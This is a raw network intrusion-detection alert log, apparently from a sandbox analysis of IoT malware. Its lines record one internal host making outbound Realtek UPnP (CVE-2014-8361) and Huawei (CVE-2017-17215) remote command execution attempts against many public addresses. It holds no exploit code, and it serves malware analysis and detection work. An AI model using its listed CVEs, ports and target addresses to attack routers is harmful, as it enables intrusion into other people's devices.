                                      07/20/24-23:01:08.571946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5621452869192.168.2.2394.221.100.187
                                      07/20/24-23:01:48.160375TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613896452869192.168.2.23182.62.146.57
                                      07/20/24-23:02:09.627181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614344252869192.168.2.23164.88.135.139
                                      07/20/24-23:00:57.220685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673437215192.168.2.23157.189.55.135
                                      07/20/24-23:01:27.650243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890037215192.168.2.23157.154.3.106
                                      07/20/24-23:01:52.934726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3963452869192.168.2.2379.195.50.112
                                      07/20/24-23:01:41.360712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596452869192.168.2.23113.116.9.186
                                      07/20/24-23:01:14.013039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671637215192.168.2.23197.122.119.125
                                      07/20/24-23:01:02.119631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798437215192.168.2.23197.253.103.224
                                      07/20/24-23:01:20.150638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618837215192.168.2.23114.205.87.78
                                      07/20/24-23:01:46.891763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4343652869192.168.2.2343.71.121.153
                                      07/20/24-23:01:45.472422TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24962852869192.168.2.2377.216.216.160
                                      07/20/24-23:01:41.474540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4473252869192.168.2.23208.75.90.116
                                      07/20/24-23:01:42.758954TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25962052869192.168.2.2352.97.71.90
                                      07/20/24-23:01:08.684499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4288652869192.168.2.2324.106.184.126
                                      07/20/24-23:01:43.415157TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25327652869192.168.2.2341.215.7.68
                                      07/20/24-23:01:42.602712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5316652869192.168.2.23190.125.30.210
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943237215192.168.2.2341.213.41.33
                                      07/20/24-23:02:01.280564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4659452869192.168.2.23161.225.124.226
                                      07/20/24-23:01:43.066571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24659852869192.168.2.23146.167.250.116
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881437215192.168.2.23197.26.40.97
                                      07/20/24-23:01:52.487978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5283652869192.168.2.23101.35.135.206
                                      07/20/24-23:02:10.589521TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4032652869192.168.2.2382.227.232.160
                                      07/20/24-23:01:21.928521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799837215192.168.2.23157.74.212.139
                                      07/20/24-23:01:08.565561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25171052869192.168.2.2370.239.61.12
                                      07/20/24-23:01:42.912947TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3483852869192.168.2.2317.17.223.92
                                      07/20/24-23:01:00.639011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797037215192.168.2.2341.232.6.48
                                      07/20/24-23:01:03.120339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615905052869192.168.2.234.72.134.93
                                      07/20/24-23:01:52.286078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615549252869192.168.2.23190.122.87.133
                                      07/20/24-23:01:41.967549TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498452869192.168.2.23154.201.154.131
                                      07/20/24-23:01:43.365017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5148852869192.168.2.2390.64.10.170
                                      07/20/24-23:01:27.650871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953237215192.168.2.2385.60.122.132
                                      07/20/24-23:01:21.951975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317437215192.168.2.2341.50.198.124
                                      07/20/24-23:00:57.221624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636637215192.168.2.23197.221.173.151
                                      07/20/24-23:01:45.165718TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23623052869192.168.2.2350.208.25.112
                                      07/20/24-23:01:11.635828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627837215192.168.2.23197.16.1.141
                                      07/20/24-23:00:57.221273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862837215192.168.2.23157.240.255.134
                                      07/20/24-23:01:48.888934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4764452869192.168.2.23130.131.47.204
                                      07/20/24-23:01:04.766644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751252869192.168.2.23151.194.118.37
                                      07/20/24-23:01:46.725077TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3347452869192.168.2.2337.189.26.199
                                      07/20/24-23:02:00.062043TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615277252869192.168.2.2334.24.67.79
                                      07/20/24-23:01:42.580745TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23644052869192.168.2.23106.27.196.147
                                      07/20/24-23:01:52.053251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3777052869192.168.2.2313.165.214.181
                                      07/20/24-23:01:41.513792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4726252869192.168.2.23112.201.119.160
                                      07/20/24-23:00:57.222164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678837215192.168.2.2369.74.218.35
                                      07/20/24-23:02:17.110283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386652869192.168.2.2361.237.192.205
                                      07/20/24-23:01:52.038833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4601452869192.168.2.2387.75.190.2
                                      07/20/24-23:01:58.055688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613359852869192.168.2.2389.139.237.174
                                      07/20/24-23:01:42.769239TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3277452869192.168.2.2399.233.112.21
                                      07/20/24-23:01:45.511523TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23766252869192.168.2.23165.221.172.161
                                      07/20/24-23:01:41.205247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4856052869192.168.2.23164.43.137.199
                                      07/20/24-23:01:44.338159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4288652869192.168.2.2324.0.173.57
                                      07/20/24-23:01:44.826234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23699452869192.168.2.23111.252.176.80
                                      07/20/24-23:02:04.577562TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615299252869192.168.2.23178.246.190.193
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392037215192.168.2.23145.149.22.179
                                      07/20/24-23:01:42.789220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614043852869192.168.2.23148.205.165.15
                                      07/20/24-23:01:43.455918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4765252869192.168.2.23145.102.1.140
                                      07/20/24-23:01:41.378872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3851052869192.168.2.23160.67.56.20
                                      07/20/24-23:01:47.403768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24737252869192.168.2.2393.36.62.56
                                      07/20/24-23:01:08.565561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3401652869192.168.2.23193.135.58.157
                                      07/20/24-23:01:44.776719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5265652869192.168.2.2358.56.54.197
                                      07/20/24-23:01:42.751499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3874252869192.168.2.23110.76.42.187
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028037215192.168.2.23197.178.38.115
                                      07/20/24-23:01:08.864629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4065052869192.168.2.23199.214.91.137
                                      07/20/24-23:01:27.658221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894437215192.168.2.2341.116.229.3
                                      07/20/24-23:01:48.970191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4990252869192.168.2.2348.202.169.141
                                      07/20/24-23:01:50.845923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24426852869192.168.2.23128.114.73.170
                                      07/20/24-23:01:24.862410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181837215192.168.2.23197.233.164.3
                                      07/20/24-23:01:50.949008TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25982052869192.168.2.23216.9.135.122
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4972037215192.168.2.23157.128.103.156
                                      07/20/24-23:01:41.919931TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25341252869192.168.2.23193.229.91.171
                                      07/20/24-23:01:48.394890TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26025052869192.168.2.2313.193.24.191
                                      07/20/24-23:01:58.751560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4374852869192.168.2.23210.49.56.86
                                      07/20/24-23:01:40.321964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611037215192.168.2.23157.164.14.81
                                      07/20/24-23:01:31.978141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745437215192.168.2.2341.151.67.249
                                      07/20/24-23:01:40.290002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455637215192.168.2.23197.71.206.186
                                      07/20/24-23:01:48.547161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613636252869192.168.2.2390.150.161.105
                                      07/20/24-23:00:57.222279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015037215192.168.2.23157.12.120.37
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439037215192.168.2.2341.141.66.103
                                      07/20/24-23:01:56.579360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083852869192.168.2.2363.43.122.73
                                      07/20/24-23:01:24.883171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314637215192.168.2.23108.136.107.241
                                      07/20/24-23:01:10.539170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5390652869192.168.2.23167.63.84.166
                                      07/20/24-23:01:45.775798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613285252869192.168.2.2334.116.171.252
                                      07/20/24-23:01:55.481754TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25709252869192.168.2.23163.119.42.207
                                      07/20/24-23:01:07.005156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134437215192.168.2.23177.72.160.248
                                      07/20/24-23:00:57.220937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251037215192.168.2.23173.155.49.17
                                      07/20/24-23:02:11.592030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614565852869192.168.2.2368.53.164.7
                                      07/20/24-23:01:04.082385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798837215192.168.2.23197.33.104.96
                                      07/20/24-23:01:08.615260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3678652869192.168.2.23201.250.207.152
                                      07/20/24-23:01:43.227281TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4762252869192.168.2.2327.86.156.82
                                      07/20/24-23:01:44.302920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3328652869192.168.2.23148.6.1.136
                                      07/20/24-23:02:02.772130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5953852869192.168.2.23189.55.165.96
                                      07/20/24-23:01:45.053180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4265052869192.168.2.23101.184.157.141
                                      07/20/24-23:01:01.143446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263852869192.168.2.23164.189.55.135
                                      07/20/24-23:01:03.153933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3466452869192.168.2.23146.210.17.240
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694037215192.168.2.2341.144.198.102
                                      07/20/24-23:01:42.643745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5362852869192.168.2.23101.9.169.24
                                      07/20/24-23:01:44.099799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3985252869192.168.2.23139.85.109.63
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048237215192.168.2.23197.124.62.106
                                      07/20/24-23:01:08.646615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5240652869192.168.2.23218.228.206.146
                                      07/20/24-23:02:14.945129TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24953652869192.168.2.2363.25.37.64
                                      07/20/24-23:01:47.943232TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613924452869192.168.2.23138.199.35.177
                                      07/20/24-23:01:08.562013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4491452869192.168.2.23155.42.58.223
                                      07/20/24-23:01:02.965900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498652869192.168.2.2384.150.128.0
                                      07/20/24-23:02:09.263272TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3988852869192.168.2.23149.74.6.111
                                      07/20/24-23:01:04.244899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503237215192.168.2.23140.185.125.173
                                      07/20/24-23:01:47.858878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5840852869192.168.2.239.44.236.192
                                      07/20/24-23:01:01.782123TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614761452869192.168.2.2360.63.234.192
                                      07/20/24-23:01:43.951862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5523852869192.168.2.23210.201.123.76
                                      07/20/24-23:01:04.049279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810037215192.168.2.23114.96.82.28
                                      07/20/24-23:00:57.221367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245037215192.168.2.2341.214.240.131
                                      07/20/24-23:01:47.931222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25200652869192.168.2.2348.216.224.125
                                      07/20/24-23:01:41.165469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4841852869192.168.2.2373.113.35.189
                                      07/20/24-23:02:04.577562TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5352452869192.168.2.2343.96.28.181
                                      07/20/24-23:01:20.593640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4400452869192.168.2.2353.137.194.88
                                      07/20/24-23:01:44.452219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5063852869192.168.2.23153.197.27.100
                                      07/20/24-23:01:46.444817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615459652869192.168.2.23129.173.206.4
                                      07/20/24-23:01:41.456455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3825452869192.168.2.23208.138.181.205
                                      07/20/24-23:01:48.308623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5814252869192.168.2.231.111.156.136
                                      07/20/24-23:01:47.858878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591052869192.168.2.23179.57.28.204
                                      07/20/24-23:01:58.892811TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23557652869192.168.2.2396.23.98.70
                                      07/20/24-23:01:42.454682TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3662852869192.168.2.2357.234.190.125
                                      07/20/24-23:01:55.428221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5567852869192.168.2.2376.116.108.138
                                      07/20/24-23:01:20.175900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309637215192.168.2.23197.118.77.21
                                      07/20/24-23:01:27.650871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213637215192.168.2.23197.178.175.16
                                      07/20/24-23:01:52.019772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615977652869192.168.2.23221.117.11.208
                                      07/20/24-23:00:57.221223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405237215192.168.2.23197.23.80.245
                                      07/20/24-23:01:20.591862TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25872052869192.168.2.235.142.247.218
                                      07/20/24-23:03:46.099099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614752452869192.168.2.23159.83.233.195
                                      07/20/24-23:01:46.604394TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615678052869192.168.2.23156.160.38.108
                                      07/20/24-23:01:24.475794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614818852869192.168.2.23162.229.91.161
                                      07/20/24-23:01:45.037292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5782652869192.168.2.2383.201.129.18
                                      07/20/24-23:01:20.124695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254637215192.168.2.2346.121.151.152
                                      07/20/24-23:01:10.863362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3622652869192.168.2.23106.229.130.40
                                      07/20/24-23:01:44.550538TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24907452869192.168.2.23167.144.253.27
                                      07/20/24-23:01:27.654172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615437215192.168.2.2341.20.72.212
                                      07/20/24-23:01:50.107973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614953052869192.168.2.23134.79.117.152
                                      07/20/24-23:01:47.304504TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614365652869192.168.2.2369.202.155.168
                                      07/20/24-23:01:31.328855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4795852869192.168.2.2362.157.173.255
                                      07/20/24-23:01:26.210078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613679452869192.168.2.23174.98.46.120
                                      07/20/24-23:01:43.066571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23893652869192.168.2.23207.203.170.191
                                      07/20/24-23:01:31.320679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24793652869192.168.2.23158.118.231.218
                                      07/20/24-23:01:44.446628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614860452869192.168.2.23130.167.196.86
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5562037215192.168.2.23157.113.182.239
                                      07/20/24-23:01:44.389834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25660452869192.168.2.23111.229.109.170
                                      07/20/24-23:01:42.672378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4401852869192.168.2.2391.196.45.114
                                      07/20/24-23:01:31.983105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293437215192.168.2.2341.17.248.200
                                      07/20/24-23:01:42.276859TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25227852869192.168.2.23193.38.103.224
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651837215192.168.2.2341.73.95.140
                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351237215192.168.2.2312.22.103.21
                                      07/20/24-23:01:26.110241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3577052869192.168.2.23212.202.137.63
                                      07/20/24-23:01:45.298540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5841652869192.168.2.23104.39.87.115
                                      07/20/24-23:01:01.875100TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614070452869192.168.2.2387.1.160.57
                                      07/20/24-23:01:47.032369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5657252869192.168.2.2331.139.123.246
                                      07/20/24-23:01:44.878540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24279852869192.168.2.23184.50.158.70
                                      07/20/24-23:01:47.569820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5961052869192.168.2.23118.111.39.192
                                      07/20/24-23:01:53.459445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5640052869192.168.2.2346.179.46.173
                                      07/20/24-23:01:42.509003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4318452869192.168.2.23113.209.32.105
                                      07/20/24-23:00:57.221557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368037215192.168.2.23157.254.68.190
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094437215192.168.2.23197.87.44.29
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975837215192.168.2.2389.37.35.33
                                      07/20/24-23:01:42.653653TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614014252869192.168.2.2358.31.233.114
                                      07/20/24-23:01:46.092258TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25542852869192.168.2.2345.99.89.219
                                      07/20/24-23:01:57.297792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624052869192.168.2.2336.5.79.111
                                      07/20/24-23:01:51.500991TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4997852869192.168.2.23204.255.198.47
                                      07/20/24-23:01:45.144955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5789852869192.168.2.23154.117.210.216
                                      07/20/24-23:01:26.000956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3988452869192.168.2.23201.230.67.6
                                      07/20/24-23:02:06.083203TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615103652869192.168.2.2331.110.77.22
                                      07/20/24-23:01:42.280419TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011452869192.168.2.23192.160.62.15
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721837215192.168.2.23197.71.69.91
                                      07/20/24-23:01:02.374539TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615489052869192.168.2.2325.0.169.170
                                      07/20/24-23:01:24.603339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5653652869192.168.2.2376.83.139.165
                                      07/20/24-23:01:31.320679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5088652869192.168.2.23156.32.87.120
                                      07/20/24-23:01:52.678633TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3776052869192.168.2.2317.76.42.20
                                      07/20/24-23:01:42.953491TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23574052869192.168.2.2357.248.72.169
                                      07/20/24-23:01:58.885082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24228452869192.168.2.23176.234.87.122
